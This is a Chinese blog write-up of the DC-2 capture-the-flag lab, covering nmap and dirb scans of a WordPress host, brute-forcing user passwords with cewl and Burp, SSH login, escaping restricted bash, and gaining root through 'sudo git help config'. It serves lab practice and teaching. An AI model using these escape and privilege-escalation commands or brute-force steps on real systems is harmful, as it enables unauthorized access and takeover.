DC2靶场练习

已于 2023-04-09 17:57:53 修改
阅读量202 收藏
点赞数
分类专栏: 靶场 文章标签: 网络安全
于 2023-04-09 15:26:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60848021/article/details/130029203
版权

目录

一,信息收集

二,漏洞扫描和漏洞利用

三,权限提升

四,总结
​​​​​​​

任务目标:该靶场有5个flag文件,找到这5个文件

一,信息收集

1,收集靶场的主机和ip地址

靶场ip是192.168.101.50 

2,端口扫描

nmap -A -P0 -p- -sS --min-rate 10000 192.168.101.50
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-08 03:01 EDT
Nmap scan report for dc-2 (192.168.101.50)
Host is up (0.00053s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:0B:47:0D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms dc-2 (192.168.101.50)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.50 seconds

 开放端口:80,7744

访问192.168.101.50

flag1文件里的提示

 思路:利用cewl工具进行密码搜集,然后用用户登录,但是该页面没有找到登录页面或者登录框,使用dirb敏感目录扫描,看可以不可以找到后台管理页面。

3,敏感信息收集

dirb http://dc-2/          

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Apr  8 03:11:24 2023
URL_BASE: http://dc-2/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://dc-2/ ----
+ http://dc-2/index.php (CODE:301|SIZE:0)                                                                                                                                                                       
+ http://dc-2/server-status (CODE:403|SIZE:292)                                                                                                                                                                 
==> DIRECTORY: http://dc-2/wp-admin/                                                                                                                                                                            
==> DIRECTORY: http://dc-2/wp-content/                                                                                                                                                                          
==> DIRECTORY: http://dc-2/wp-includes/                                                                                                                                                                         
+ http://dc-2/xmlrpc.php (CODE:405|SIZE:42)                                                                                                                                                                     
                                                                                                                                                                                                                
---- Entering directory: http://dc-2/wp-admin/ ----
+ http://dc-2/wp-admin/admin.php (CODE:302|SIZE:0)                                                                                                                                                              
==> DIRECTORY: http://dc-2/wp-admin/css/                                                                                                                                                                        
==> DIRECTORY: http://dc-2/wp-admin/images/                                                                                                                                                                     
==> DIRECTORY: http://dc-2/wp-admin/includes/                                                                                                                                                                   
+ http://dc-2/wp-admin/index.php (CODE:302|SIZE:0)                                                                                                                                                              
==> DIRECTORY: http://dc-2/wp-admin/js/                                                                                                                                                                         
==> DIRECTORY: http://dc-2/wp-admin/maint/                                                                                                                                                                      
==> DIRECTORY: http://dc-2/wp-admin/network/                                                                                                                                                                    
==> DIRECTORY: http://dc-2/wp-admin/user/                                                                                                                                                                       
                                                                                                                                                                                                                
---- Entering directory: http://dc-2/wp-content/ ----
+ http://dc-2/wp-content/index.php (CODE:200|SIZE:0)                                                                                                                                                            
==> DIRECTORY: http://dc-2/wp-content/languages/                                                                                                                                                                
==> DIRECTORY: http://dc-2/wp-content/plugins/                                                                                                                                                                  
==> DIRECTORY: http://dc-2/wp-content/themes/                                                                                                                                                                   
                                                                                                                                                                                                                
---- Entering directory: http://dc-2/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://dc-2/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://dc-2/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://dc-2/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://dc-2/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://dc-2/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://dc-2/wp-admin/network/ ----
+ http://dc-2/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                                                                                                      
+ http://dc-2/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                                                                                                      
                                                                                                                                                                                                                
---- Entering directory: http://dc-2/wp-admin/user/ ----
+ http://dc-2/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                                                                                                         
+ http://dc-2/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                                                                                                         
                                                                                                                                                                                                                
---- Entering directory: http://dc-2/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                
---- Entering directory: http://dc-2/wp-content/plugins/ ----
+ http://dc-2/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                                                                                                    
                                                                                                                                                                                                                
---- Entering directory: http://dc-2/wp-content/themes/ ----
+ http://dc-2/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                                                                                                     
                                                                                                                                                                                                                
-----------------
END_TIME: Sat Apr  8 03:11:47 2023
DOWNLOADED: 32284 - FOUND: 12

二,漏洞扫描和漏洞利用

nmap漏洞扫描

nmap --script=vuln -p 80,7744 192.168.101.50        
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-08 03:16 EDT
Nmap scan report for dc-2 (192.168.101.50)
Host is up (0.00035s latency).

PORT     STATE SERVICE
80/tcp   open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2 
|   /: WordPress version: 4.7.10
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users: 
| Username found: admin
| Username found: tom
| Username found: jerry
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
7744/tcp open  raqmon-pdu
MAC Address: 00:0C:29:0B:47:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.72 seconds

通过以上扫描报告可以看出,虽然没有扫描出漏洞,但是却意外获得了三个用户名:admin,tom,jerry.和flag1的提示相呼应,所以现在需要做的就是使用cewl工具进行密码收集

 

使用BP进行爆破

 tom     parturient

 jerry    adipiscing

 登录成功

登录tom用户啥都没发现,登录jerry试试

 

 思路:CMS管理系统没法利用,提示换个切入点,刚才nmap扫描中有一个7744端口,服务显示的是SSH,可以试试SSH远程登录

 获取webshell成功。

三,权限提升

查看flag3文件发现rbash限制

 绕过rbash限制

绕过命令:
tom@DC-2:~$ BASH_CMDS[a]=/bin/bash
tom@DC-2:~$ a
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin

 flag3文件内容

意思是使用su命令切换到jerry用户

flag4文件内容

使用find命令查找最后一个文件,都是没有权限,现在需要提权

使用sudo提权,查看具有root权限的文件

 git提权命令

sudo git help config

!/bin/bash

提权成功并找到最后一个文件了

四,总结

1,cewl工具的运用

2,rbash限制以及绕过

一条贤鱼的学习站
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[渗透测试实战]vulnhub靶场1 初步掌握渗透流程(详细步骤)
知识库总结、分享
07-01 1511
Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点,因为它可以测试系统的响应能力,以及处理异常数据的能力。目前已知系统提供的服务ssh和http,web用的是WordPress cms系统,渗透系统希望获得用户和密码,访问WordPress看能不能得到账户信息。拿到正确参数,需要传入参数访问url拿到系统信息,参数file是文件的意思,第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!
DC-2靶机渗透测试记录
qq_33163046的博客
12-22 1万+
攻击机 kali-linux-2020.4-vbox-i386 设置 USB设备关闭,网络连接方式仅主机(Host-Only)网络。 攻击机IP 192.168.56.103 步骤1 靶机目标发现 因为靶机和攻击机在同一个网络内,所以使用KALI上arp-scan -l 进行扫描。扫描确定了靶机的IP是192.168.56.104。 ┌──(root??kali)-[/etc] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 0...
DC2靶机练习
LSYZWF的博客
04-22 286
实验环境:DC-2靶机,kali linux攻击机,win10辅助机 靶机: 链接:https://pan.baidu.com/s/1naWHuZDDwWOI2zqO6vG6OA 提取码:rkzw 1、kali主机扫描内网存活主机 查询kali主机的ip地址:192.168.246.130 创建DC2专用文件夹 开始扫描 继续具体扫描目标主机 开放的端口 目标系统开放了80端口与7744端口 开放了80端口,用浏览器访问ip地址,发现网页打不开,但是网址重定向为http://dc-2 所以需要在物
学习测试day_5
bgxeg的博客
11-29 205
#define _CRT_SECURE_NO_WARNINGS 1 #include<stdio.h> #include<string.h> #include<windows.h> #include<stdlib.h> int main() { int i = 0; char password[20] = { 0 }; printf(“请输入密码:>”); scanf("%s", password); for (i = 0; i < 3; i++)
DC2靶场练习笔记
最新发布
ice_rib的博客
03-24 1465
开放端口和服务:80-http;7744-sshweb构架:linux-apache-wordpress-mysql-php敏感目录若干。
dc2wmiparser.exe
07-24
常用工具:win10开发常用工具,亲测好用,使用平台为win10的1809 64位系统。其他平台未验证。
DC2DC_Chopper.rar
06-03
《基于MATLAB的DC2DC斩波电路仿真详解》 在电力电子技术领域,DC2DC斩波电路是一种重要的直流电压转换方式,广泛应用于电源管理、电池系统、电动车充电等领域。本文将围绕“DC2DC_Chopper.rar”压缩包中的内容,...
dc2irc Relay-开源
05-01
NMDC到IRC中继服务器。 将自己公开为IRC服务器,IRC客户端可以连接到该服务器,然后加入对应于集线器地址的通道,该通道将允许对符合NMDC的集线器进行聊天访问。 与eggdrop机器人完美配合以提供游戏。
DC2-analysis:DC2数据集的常规分析工具
05-10
DC2分析 该存储库包含DC2模拟数据集的常规分析脚本。 特定于项目的工作可以在单独的存储库中完成,但是一些分析任务通常会很有用,并且可以在此处包括相关的脚本和笔记本以供更一般的使用。 :right_arrow: ! 链接...
DC2AC converter with SVM in Plecs
09-08
DC2AC converter with SVM done in plecs so it's easy to modify without a PLL for simplicity.
Nmap扫描教程之基础扫描详解
热门推荐
大学霸__IT达人
06-29 2万+
Nmap扫描教程之基础扫描详解
靶机渗透练习44-DarkHole-1
hirak0的博客
04-19 884
靶机描述 靶机地址:https://www.vulnhub.com/entry/darkhole-1,724/ Description Difficulty: Easy It’s a box for beginners, but not easy, Good Luck Hint: Don’t waste your time For Brute-Fo 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.142 注:靶机与Kali的
横向渗透学习记录
AaronLuo
02-18 2619
声明 参考链接:https://mp.weixin.qq.com/s/8rh2huPyyvarfXkMeo770w 靶机 Ubuntu(192.168.93.120) CentOS(192.168.93.100)(192.168.1.14) windows7 Pc (192.168.93.30) windows server 2008(192.168.93.20) windwos server ...
靶机渗透练习45-DarkHole-2
hirak0的博客
04-19 2044
靶机描述 靶机地址:https://www.vulnhub.com/entry/darkhole-2,740/ Description Difficulty:Hard This works better with VMware rather than VirtualBox Hint: Don’t waste your time For Brute-Forc 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.143 注:靶机与K
vulnhub笔记:from_sqli_to_shell
X
07-03 462
信息收集 端口扫描 # nmap -p- -sC -sV 192.168.111.141 -oA scans/allport Nmap scan report for 192.168.111.141 Host is up (0.00043s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze2 (protocol 2.
apache 配置虚拟路径和访问权限
zhanglinlang的专栏
03-02 2248
在 apache.conf 中,搜索 DocumentRoot 修改路径为自己设置的虚拟路径就可以: (e.g DocumentRoot “E:/www”)并且还要修改它下面的 Directory 否则会出现权限无法访问的问题。DocumentRoot "C:/www" <Directory "C:/www">扩展内容 权限的细节设置 Directory 目录下 个参数的解释:Op
css101路由密码,192.168.0.101登陆官网登录入口
weixin_31063029的博客
08-03 1万+
192.168.0.101 IP地址说明192.168.0.101是路由器的专有地址;如果你想通过192.168.0.101访问路由器的管理页面请输入192.168.0.101到Web浏览器的地址栏或点击下面的链接。另外,192.168.0.101也可能是你电脑或手机获取到的一个私有IP;如果192.168.0.101不能打开路由器界面,你应该尝试输入:192.168.0.1;这是因为通常把IP后...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8339
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
cbm-dc2 超声波程序
10-14
CBM-DC2超声波程序是一种基于超声波技术的测量程序。CBM是嵌入式系统名称,DC2则表示第二代设备。该程序主要应用于测量距离、检测物体的位置、识别物体的形状等方面。 CBM-DC2超声波程序的工作原理是通过超声波发射...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值